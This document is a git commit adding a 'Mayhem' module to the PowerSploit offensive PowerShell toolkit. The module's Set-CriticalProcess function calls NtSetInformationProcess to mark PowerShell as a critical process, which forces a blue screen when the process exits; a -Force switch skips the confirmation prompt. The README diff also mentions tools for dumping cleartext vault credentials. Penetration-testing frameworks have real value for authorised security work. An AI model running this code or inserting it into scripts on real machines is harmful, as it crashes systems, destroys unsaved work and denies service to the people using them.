Adding Mayhem module and Set-CriticalProcess

2014-06-19 20:28:50 -04:00 · 2014-06-19 20:28:50 -04:00 · 29a5d48c3f
parent 80ffa19fa3
commit 29a5d48c3f
4 changed files with 206 additions and 0 deletions
--- a/Mayhem/Mayhem.psd1
+++ b/Mayhem/Mayhem.psd1
@ -0,0 +1,87 @@
+@{
+
+# Script module or binary module file associated with this manifest.
+ModuleToProcess = 'Mayhem.psm1'
+
+# Version number of this module.
+ModuleVersion = '1.0.0.0'
+
+# ID used to uniquely identify this module
+GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c'
+
+# Author of this module
+Author = 'Matthew Graeber'
+
+# Company or vendor of this module
+CompanyName = ''
+
+# Copyright statement for this module
+Copyright = 'BSD 3-Clause'
+
+# Description of the functionality provided by this module
+Description = 'PowerSploit Mayhem Module'
+
+# Minimum version of the Windows PowerShell engine required by this module
+PowerShellVersion = '2.0'
+
+# Name of the Windows PowerShell host required by this module
+# PowerShellHostName = ''
+
+# Minimum version of the Windows PowerShell host required by this module
+# PowerShellHostVersion = ''
+
+# Minimum version of the .NET Framework required by this module
+# DotNetFrameworkVersion = ''
+
+# Minimum version of the common language runtime (CLR) required by this module
+# CLRVersion = ''
+
+# Processor architecture (None, X86, Amd64) required by this module
+# ProcessorArchitecture = ''
+
+# Modules that must be imported into the global environment prior to importing this module
+# RequiredModules = @()
+
+# Assemblies that must be loaded prior to importing this module
+# RequiredAssemblies = @()
+
+# Script files (.ps1) that are run in the caller's environment prior to importing this module.
+# ScriptsToProcess = ''
+
+# Type files (.ps1xml) to be loaded when importing this module
+# TypesToProcess = @()
+
+# Format files (.ps1xml) to be loaded when importing this module
+# FormatsToProcess = @()
+
+# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
+# NestedModules = @()
+
+# Functions to export from this module
+FunctionsToExport = '*'
+
+# Cmdlets to export from this module
+CmdletsToExport = '*'
+
+# Variables to export from this module
+VariablesToExport = ''
+
+# Aliases to export from this module
+AliasesToExport = ''
+
+# List of all modules packaged with this module.
+ModuleList = @(@{ModuleName = 'Mayhem'; ModuleVersion = '1.0.0.0'; GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c'})
+
+# List of all files packaged with this module
+FileList = 'Mayhem.psm1', 'Mayhem.psd1', 'Usage.md'
+
+# Private data to pass to the module specified in RootModule/ModuleToProcess
+# PrivateData = ''
+
+# HelpInfo URI of this module
+# HelpInfoURI = ''
+
+# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
+# DefaultCommandPrefix = ''
+
+}
--- a/Mayhem/Mayhem.psm1
+++ b/Mayhem/Mayhem.psm1
@ -0,0 +1,99 @@
+function Set-CriticalProcess
+{
+<#
+.SYNOPSIS
+
+Causes your machine to blue screen upon exiting PowerShell.
+
+PowerSploit Function: Set-CriticalProcess
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+.PARAMETER ExitImmediately
+
+Immediately exit PowerShell after successfully marking the process as critical.
+
+.PARAMETER Force
+
+Set the running PowerShell process as critical without asking for confirmation.
+
+.EXAMPLE
+
+Set-CriticalProcess
+
+.EXAMPLE
+
+Set-CriticalProcess -ExitImmediately
+
+.EXAMPLE
+
+Set-CriticalProcess -Force -Verbose
+
+#>
+
+    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param (
+        [Switch]
+        $Force,
+
+        [Switch]
+        $ExitImmediately
+    )
+
+    if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))
+    {
+        throw 'You must run Set-CriticalProcess from an elevated PowerShell prompt.'
+    }
+
+    $Response = $True
+
+    if (!$Force)
+    {
+        $Response = $psCmdlet.ShouldContinue('Have you saved all your work?', 'The machine will blue screen when you exit PowerShell.')
+    }
+    
+    if (!$Response)
+    {
+        return
+    }
+
+    $DynAssembly = New-Object System.Reflection.AssemblyName('BlueScreen')
+    $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
+    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BlueScreen', $False)
+
+    # Define [ntdll]::NtQuerySystemInformation method
+    $TypeBuilder = $ModuleBuilder.DefineType('BlueScreen.Win32.ntdll', 'Public, Class')
+    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('NtSetInformationProcess',
+                                                        'ntdll.dll',
+                                                        ([Reflection.MethodAttributes] 'Public, Static'),
+                                                        [Reflection.CallingConventions]::Standard,
+                                                        [Int32],
+                                                        [Type[]] @([IntPtr], [UInt32], [IntPtr].MakeByRefType(), [UInt32]),
+                                                        [Runtime.InteropServices.CallingConvention]::Winapi,
+                                                        [Runtime.InteropServices.CharSet]::Auto)
+
+    $ntdll = $TypeBuilder.CreateType()
+
+    $ProcHandle = [Diagnostics.Process]::GetCurrentProcess().Handle
+    $ReturnPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(4)
+
+    $ProcessBreakOnTermination = 29
+    $SizeUInt32 = 4
+
+    try
+    {
+        $null = $ntdll::NtSetInformationProcess($ProcHandle, $ProcessBreakOnTermination, [Ref] $ReturnPtr, $SizeUInt32)
+    }
+    catch
+    {
+        return
+    }
+
+    Write-Verbose 'PowerShell is now marked as a critical process and will blue screen the machine upon exiting the process.'
+
+    if ($ExitImmediately)
+    {
+        Stop-Process -Id $PID
+    }
+}
--- a/Mayhem/Usage.md
+++ b/Mayhem/Usage.md
@ -0,0 +1,12 @@
+To install this module, drop the entire Mayhem folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
+
+The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
+The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
+
+To use the module, type `Import-Module Mayhem`
+
+To see the commands imported, type `Get-Command -Module Mayhem`
+
+For help on each individual command, Get-Help is your friend.
+
+Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--- a/README.md
+++ b/README.md
@ -196,6 +196,14 @@ Displays Windows vault credential objects including cleartext web credentials.

 Generates a full-memory minidump of a process.

+## Mayhem
+
+**Cause general mayhem with PowerShell.**
+
+#### `Set-CriticalProcess`
+
+Causes your machine to blue screen upon exiting PowerShell.
+
 ## Recon

 **Tools to aid in the reconnaissance phase of a penetration test.**